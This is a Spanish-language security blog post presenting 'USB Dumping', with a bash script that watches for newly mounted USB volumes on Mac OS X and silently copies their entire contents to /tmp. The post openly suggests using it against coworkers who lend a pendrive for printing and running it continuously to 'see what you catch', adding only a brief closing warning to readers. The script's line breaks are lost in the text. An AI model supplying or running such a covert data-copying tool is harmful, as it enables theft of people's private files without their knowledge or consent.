Copiar el contenido de un pendrive de forma oculta en Mac OS X (USB Dumping)


Una de las técnicas de robo de información de forma local es la llamada ‘USB Dumping’. Ésta técnica consiste en realizar un copiado de la información de cualquier dispositivo USB que se conecte a nuestro equipo, de forma totalmente transparente al usuario.

Éste tipo de ataques puede resultar útil en entornos de trabajo en los cuales un compañero te pide la impresión de un documento, y para ello te proporciona un pendrive en el cual está el documento a imprimir junto con un montón de datos que el usuario, descuidadamente, mantiene en el mismo dispositivo.

De este modo, al conectar el dispositivo USB para la impresión del documento, se estará produciendo un copiado al completo del contenido del disco y, aunque el propietario del pendrive esté atento a las acciones realizadas sobre el mismo, le será imposible detectar que se ha realizado una copia de toda su información.

Desde Seguridad Apple hemos desarrollado un pequeño script que realiza esta tarea y que puedes tener corriendo siempre en tu sistema Mac OS X para ver que “cazas”. Normalmente la gente suele mezclar en sus pendrives personales documentos de trabajo, datos de intercambio y cosas de alto nivel de intimidad. El código es el siguiente:

#!/bin/bash#www.seguridadapple.comfunction saveDefaultDevices(){rm -rf /tmp/usblist /tmp/Volumesmkdir /tmp/Volumesfor vol in /Volumes/*doecho $vol >> /tmp/usblistecho "Detecting $vol as default"done}function checkDevices(){for vol in /Volumes/*doaux=`cat /tmp/usblist |grep -i "$vol"`aux=`echo $?`if [ $aux -eq 1 ]; thenecho $vol >> /tmp/usblistmkdir "/tmp$vol"echo "[+] Dumping $vol in /tmp$vol"sleep 1cp -R "$vol" "/tmp/Volumes/"echo "[+] Done"fidone}saveDefaultDeviceswhile [ 1 ]; docheckDevicessleep 1done

El funcionamiento del script es muy sencillo. Únicamente es necesario ejecutarlo mediante el comando ‘sh usb.sh’, y esperar a que se introduzca un nuevo dispositivo USB. Será en este momento en el cual el script detectará su presencia y comenzará a realizar su volcado en el directorio “/tmp/Volumes/“.


Como se ve en las capturas de pantalla, tras realizarse el volcado de “/Volumes/Untitled”, se puede acceder a su contenido copiado en ”/tmp/Volumes/Untitled/


Ten mucho cuidado donde pinchas un pendrive ya que el peligro no es sólo que se infecte, sino que te roben todos los datos que en él tengas sin que te des cuenta.

Share

This entry was posted in robo, tools. Bookmark the permalink.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

For security, use of Google's reCAPTCHA service is required which is subject to the Google Privacy Policy and Terms of Use.

I agree to these terms.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.